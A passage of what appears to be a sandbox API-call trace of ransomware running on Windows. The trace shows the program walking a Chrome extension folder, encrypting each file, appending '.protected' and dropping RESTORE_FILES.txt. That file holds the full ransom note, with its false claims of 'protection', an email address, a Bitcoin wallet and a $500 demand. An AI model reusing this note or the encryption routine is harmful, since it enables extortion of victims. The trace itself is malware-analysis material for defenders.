(in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, 
lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.892] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.892] CloseHandle (hObject=0x160) returned 1 [0078.892] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.protected") returned 149 [0078.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.protected")) returned 1 [0078.893] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.893] lstrcmpiW (lpString1="main.js", lpString2="Windows") returned -1 [0078.893] lstrcmpiW (lpString1="main.js", lpString2="Program Files") returned -1 [0078.893] lstrcmpiW (lpString1="main.js", lpString2="Program Files (x86)") returned -1 [0078.893] lstrcmpiW (lpString1="main.js", lpString2="$Recycle.bin") returned 1 [0078.893] lstrcmpiW (lpString1="main.js", lpString2="System Volume Information") returned -1 [0078.893] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js") returned 137 [0078.893] StrStrIW (lpFirst="main.js", lpSrch=".protected") returned 0x0 [0078.893] lstrcmpW (lpString1="main.js", lpString2="RESTORE_FILES.txt") returned -1 [0078.893] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.893] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js") returned 137 [0078.893] StrStrW (lpFirst="main.js", lpSrch=".txt") returned 0x0 [0078.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js") returned 137 [0078.893] StrStrW (lpFirst="main.js", lpSrch=".rar") returned 0x0 [0078.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js") returned 137 [0078.893] StrStrW (lpFirst="main.js", lpSrch=".zip") returned 0x0 [0078.893] ReadFile (in: 
hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5b, lpOverlapped=0x0) returned 1 [0078.894] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.894] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5b, lpOverlapped=0x0) returned 1 [0078.894] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.894] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.894] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.894] CloseHandle (hObject=0x160) returned 1 [0078.894] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.protected") returned 147 [0078.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.protected")) returned 1 [0078.895] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.895] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0078.895] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0078.895] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0078.895] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0078.895] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0078.895] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json") returned 143 [0078.895] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0078.895] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.895] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.895] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json") returned 143 [0078.896] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0078.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json") returned 143 [0078.896] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0078.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json") returned 143 [0078.896] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0078.896] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.897] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffd2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.897] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.897] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.897] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.898] WriteFile 
(in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.898] CloseHandle (hObject=0x160) returned 1 [0078.898] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.protected") returned 153 [0078.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.protected")) returned 1 [0078.898] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.898] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0078.898] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0078.898] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0078.899] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0078.899] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0078.899] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 138 [0078.899] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0078.899] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0078.899] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*") returned 140 [0078.899] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0078.901] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.901] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.901] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.901] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.901] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.901] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\.") returned 140 [0078.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.901] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.901] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.901] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.901] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.901] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.901] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned 
-1 [0078.901] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\..") returned 141 [0078.901] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.901] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.901] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.901] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0078.901] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0078.901] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0078.901] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0078.901] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0078.901] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned 141 [0078.901] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0078.901] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0078.902] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*") returned 143 [0078.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.902] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.902] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0078.902] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.902] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.902] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.902] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\.") returned 143 [0078.902] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.902] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.905] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.905] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.905] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.905] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.905] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.905] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\..") returned 144 [0078.905] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.905] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.905] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.905] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.905] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.905] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.905] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.905] lstrcmpiW 
(lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.905] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.905] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.905] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.905] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.905] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.906] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.906] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.906] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.906] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.906] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf6, lpOverlapped=0x0) returned 1 [0078.907] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.907] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf6, lpOverlapped=0x0) returned 1 [0078.907] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.907] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.907] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.907] CloseHandle (hObject=0x168) returned 1 [0078.908] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.protected") returned 165 [0078.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.protected")) returned 1 [0078.908] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.908] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.908] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\RESTORE_FILES.txt") returned 159 [0078.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.909] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.909] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.909] lstrlenA (lpString="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") returned 684 [0078.909] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
